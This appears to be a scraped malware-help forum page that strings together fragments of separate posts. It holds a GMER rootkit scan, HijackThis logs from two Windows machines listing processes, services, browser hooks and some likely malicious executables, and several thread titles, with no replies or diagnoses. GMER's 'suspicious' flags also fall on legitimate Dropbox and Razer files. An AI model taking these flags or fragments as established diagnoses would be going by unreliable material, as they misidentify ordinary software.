O23 - Service: ASUS HM Com Service (asHmComSvc) - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe
O23 - Service: ASUS System Control Service (AsSysCtrlService) - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe
O23 - Service: AsusFanControlService - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\AsusFanControlService\1.01.06\AsusFanControlService.exe
O23 - Service: Kaspersky Anti-Virus Service (AVP) - Kaspersky Lab ZAO - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: DTSAudioSvc - DTS, Inc - C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: MBAMScheduler - Malwarebytes Corporation - C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
O23 - Service: MBAMService - Malwarebytes Corporation - C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NVIDIA Network Service (NvNetworkService) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
O23 - Service: NVIDIA Streamer Service (NvStreamSvc) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing)
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
O23 - Service: TabletServicePen - Wacom Technology, Corp. - C:\Program Files\Tablet\Pen\Pen_Tablet.exe
O23 - Service: Wacom Consumer Touch Service (TouchServicePen) - Wacom Technology, Corp. - C:\Program Files\Tablet\Pen\Pen_TouchService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 14596 bytes


100% cpu usage, malwares, etc problems

ARK:

GMER 2.1.19357 - http://www.gmer.net
Rootkit scan 2014-05-11 12:32:37
Windows 6.1.7601 Service Pack 1 x64 \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1 Intel___ rev.1.0. 931.52GB
Running: f5b4wqix.exe; Driver: C:\Users\Maxime\AppData\Local\Temp\fgrcypob.sys


---- User code sections - GMER 2.1 ----

.text C:\windows\system32\wininit.exe[764] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\winlogon.exe[840] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\services.exe[884] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\lsass.exe[892] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\svchost.exe[152] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\nvvsvc.exe[424] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\svchost.exe[468] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\System32\svchost.exe[788] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\System32\svchost.exe[772] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\svchost.exe[1060] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\svchost.exe[1176] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\svchost.exe[1280] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe[1556] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\nvvsvc.exe[1564] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\SYSTEM32\WISPTIS.EXE[1604] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\System32\spoolsv.exe[1840] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\svchost.exe[1880] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\lxbucoms.exe[2032] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\SysWOW64\MSIService.exe[1164] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\Program Files\003\nuttkoqiez64.exe[2288] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe[2320] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2444] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2444] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000076541465 2 bytes [54, 76]
.text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2444] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 00000000765414bb 2 bytes [54, 76]
.text ... * 2
.text C:\windows\SysWOW64\PnkBstrA.exe[2492] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\windows\SysWOW64\PnkBstrA.exe[2492] C:\windows\SysWOW64\WSOCK32.dll!setsockopt + 322 00000000734e1a22 2 bytes [4E, 73]
.text C:\windows\SysWOW64\PnkBstrA.exe[2492] C:\windows\SysWOW64\WSOCK32.dll!setsockopt + 496 00000000734e1ad0 2 bytes [4E, 73]
.text C:\windows\SysWOW64\PnkBstrA.exe[2492] C:\windows\SysWOW64\WSOCK32.dll!setsockopt + 552 00000000734e1b08 2 bytes [4E, 73]
.text C:\windows\SysWOW64\PnkBstrA.exe[2492] C:\windows\SysWOW64\WSOCK32.dll!setsockopt + 730 00000000734e1bba 2 bytes [4E, 73]
.text C:\windows\SysWOW64\PnkBstrA.exe[2492] C:\windows\SysWOW64\WSOCK32.dll!setsockopt + 762 00000000734e1bda 2 bytes [4E, 73]
.text C:\windows\SysWOW64\PnkBstrA.exe[2492] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000076541465 2 bytes [54, 76]
.text C:\windows\SysWOW64\PnkBstrA.exe[2492] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 00000000765414bb 2 bytes [54, 76]
.text ... * 2
.text C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe[2812] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\windows\system32\svchost.exe[2984] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\Microsoft\System Update kb77600\WindowsUpdater.exe[2184] C:\windows\syswow64\KERNEL32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\windows\Microsoft\System Update kb77600\WindowsUpdater.exe[2184] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000076541465 2 bytes [54, 76]
.text C:\windows\Microsoft\System Update kb77600\WindowsUpdater.exe[2184] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 00000000765414bb 2 bytes [54, 76]
.text ... * 2
.text C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE[2908] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe[2376] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe[2416] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE[3280] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE[3280] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000076541465 2 bytes [54, 76]
.text C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE[3280] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 00000000765414bb 2 bytes [54, 76]
.text ... * 2
.text C:\windows\system32\wbem\wmiprvse.exe[3376] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\svchost.exe[3808] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\svchost.exe[3940] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\taskhost.exe[4112] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe[4124] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\conhost.exe[4132] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\SYSTEM32\WISPTIS.EXE[4164] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe[4176] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\Dwm.exe[4216] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\Explorer.EXE[4292] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\taskeng.exe[4720] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[5024] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[5024] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000076541465 2 bytes [54, 76]
.text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[5024] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 00000000765414bb 2 bytes [54, 76]
.text ... * 2
.text C:\windows\system32\SearchIndexer.exe[4732] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\Users\Maxime\AppData\Roaming\Dropbox\bin\Dropbox.exe[4764] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\Users\Maxime\AppData\Roaming\Dropbox\bin\Dropbox.exe[4764] C:\windows\syswow64\Psapi.dll!GetModuleInformation + 69 0000000076541465 2 bytes [54, 76]
.text C:\Users\Maxime\AppData\Roaming\Dropbox\bin\Dropbox.exe[4764] C:\windows\syswow64\Psapi.dll!GetModuleInformation + 155 00000000765414bb 2 bytes [54, 76]
.text ... * 2
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[4784] C:\windows\syswow64\KERNEL32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[4784] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000076541465 2 bytes [54, 76]
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[4784] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 00000000765414bb 2 bytes [54, 76]
.text ... * 2
.text C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe[5060] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\Program Files\NVIDIA Corporation\Display\nvtray.exe[4884] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\Program Files\AVAST Software\Avast\AvastUI.exe[4652] C:\windows\syswow64\kernel32.dll!SetUnhandledExceptionFilter 00000000766b87b1 8 bytes [31, C0, C2, 04, 00, 90, 90, ...]
.text C:\Program Files\AVAST Software\Avast\AvastUI.exe[4652] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\Program Files\Windows Media Player\wmpnetwk.exe[5644] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\System32\svchost.exe[5844] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\DllHost.exe[6184] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\wuauclt.exe[2748] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\windows\system32\svchost.exe[1316] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007709eecd 1 byte [62]
.text C:\Program Files (x86)\MSR\Privoxy\privoxy.exe[7364] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\Program Files (x86)\MSR\Privoxy\privoxy.exe[7364] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000076541465 2 bytes [54, 76]
.text C:\Program Files (x86)\MSR\Privoxy\privoxy.exe[7364] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 00000000765414bb 2 bytes [54, 76]
.text ... * 2
.text C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe[7240] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\TabTip32.exe[3264] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\Users\Maxime\Downloads\HijackThis.exe[5660] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
? C:\windows\system32\mssprxy.dll [5660] entry point in ".rdata" section 00000000744b71e6
.text C:\Users\Maxime\Downloads\HijackThis.exe[5660] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000076541465 2 bytes [54, 76]
.text C:\Users\Maxime\Downloads\HijackThis.exe[5660] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 00000000765414bb 2 bytes [54, 76]
.text ... * 2
.text C:\windows\SysWOW64\NOTEPAD.EXE[2280] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\windows\SysWOW64\NOTEPAD.EXE[1968] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\windows\SysWOW64\NOTEPAD.EXE[8048] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]
.text C:\Users\Maxime\Downloads\f5b4wqix.exe[4708] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 00000000766da30a 1 byte [62]

---- Threads - GMER 2.1 ----

Thread c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [4824:6448] 000007fef541c0d0
---- Processes - GMER 2.1 ----

Library C:\Users\Maxime\AppData\Roaming\Dropbox\bin\wxmsw28uh_vc.dll (*** suspicious ***) @ C:\Users\Maxime\AppData\Roaming\Dropbox\bin\Dropbox.exe [4764](2014-01-03 03:42:50) 0000000003b30000
Library c:\users\maxime\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp1h0n1k.dll (*** suspicious ***) @ C:\Users\Maxime\AppData\Roaming\Dropbox\bin\Dropbox.exe [4764](2014-05-03 16:43:48) 0000000004440000
Library C:\Users\Maxime\AppData\Roaming\Dropbox\bin\libcef.dll (*** suspicious ***) @ C:\Users\Maxime\AppData\Roaming\Dropbox\bin\Dropbox.exe [4764](2013-10-18 23:55:02) 000000005c060000
Library C:\Users\Maxime\AppData\Roaming\Dropbox\bin\icudt.dll (*** suspicious ***) @ C:\Users\Maxime\AppData\Roaming\Dropbox\bin\Dropbox.exe [4764] (ICU Data DLL/The ICU Project)(2013-10-18 23:55:00) 000000005e640000
Library C:\ProgramData\Razer\Synapse\Devices\RazerConfigNative.dll (*** suspicious ***) @ C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [4784] (Razer Configurator/Razer Inc.)(2013-06-26 10:35:50) 000000005f850000

---- Registry - GMER 2.1 ----

Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\dca971072799
Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\dca971343f36
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\dca971072799 (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\dca971343f36 (not active ControlSet)

---- Files - GMER 2.1 ----

File C:\Users\Maxime\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000dc0 29270 bytes

---- EOF - GMER 2.1 ----

Infected by CouponDropDown

I thought "in the old days" I used to see a pie-chart but I guess that doesn't happen any more. :)
However, I do see that FT Downloader is still returning as an extension. :(

Peculiar Java and Windows Paint Issue.

I guess I need help with both problems.

Virus installed itself, messed up Firefox and System Restore

HijackThis Log:

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 1:25:47 PM, on 5/11/2014
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
c:\PROGRA~1\AVG\AVG2014\avgrsx.exe
C:\Program Files\AVG\AVG2014\avgcsrvx.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\AVG\AVG2014\avgidsagent.exe
C:\Program Files\AVG\AVG2014\avgwdsvc.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\AVG\AVG2014\avgnsx.exe
C:\Program Files\AVG\AVG2014\avgemcx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\ps2.exe
C:\Program Files\AVG\AVG2014\avgui.exe
C:\Program Files\NETGEAR\WG311v3\WG311v3.exe
C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\issch.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\HP_Owner.ELLENSPC\Desktop\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TY...rm1=seconduser
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://ie.redirect.hp.com/svs/rdr?TY...rm1=seconduser
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://ie.redirect.hp.com/svs/rdr?TY...rm1=seconduser
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://ie.redirect.hp.com/svs/rdr?TY...rm1=seconduser
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TY...rm1=seconduser
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://ie.redirect.hp.com/svs/rdr?TY...ion&pf=desktop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://ie.redirect.hp.com/svs/rdr?TY...ion&pf=desktop
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG2012\avgssie.dll (file missing)
O2 - BHO: NCO 2.0 IE BHO - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - (no file)
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll (file missing)
O3 - Toolbar: HP View - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\Program Files\HP\Digital Imaging\bin\HPDTLK02.dll
O3 - Toolbar: (no name) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - (no file)
O4 - HKLM\..\Run: [LSBWatcher] "c:\hp\drivers\hplsbwatcher\lsburnwatcher.exe"
O4 - HKLM\..\Run: [ISUSPM Startup] "C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe" -startup
O4 - HKLM\..\Run: [PS2] C:\WINDOWS\system32\ps2.exe
O4 - HKLM\..\Run: [AVG_UI] "C:\Program Files\AVG\AVG2014\avgui.exe" /TRAYONLY
O4 - HKLM\..\Run: [HP Component Manager] "C:\Program Files\HP\hpcoretech\hpcmpmgr.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [ISUSScheduler] "C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\issch.exe" -start
O4 - Global Startup: NETGEAR WG311v3 Smart Wizard.lnk = C:\Program Files\NETGEAR\WG311v3\WG311v3.exe
O8 - Extra context menu item: &Google Search - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: Backward Links - res://C:\Program Files\Google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://C:\Program Files\Google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Similar Pages - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate into English - res://C:\Program Files\Google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra button: Connection Help - {E2D4D26B-0180-43a4-B05F-462D6D54C789} - C:\WINDOWS\PCHEALTH\HELPCTR\Vendors\CN=Hewlett-Packard,L=Cupertino,S=Ca,C=US\IEButton\support.htm (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Connection Help - {E2D4D26B-0180-43a4-B05F-462D6D54C789} - C:\WINDOWS\PCHEALTH\HELPCTR\Vendors\CN=Hewlett-Packard,L=Cupertino,S=Ca,C=US\IEButton\support.htm (file missing) (HKCU)
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/wind...?1362500382361
O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG2012\avgpp.dll (file missing)
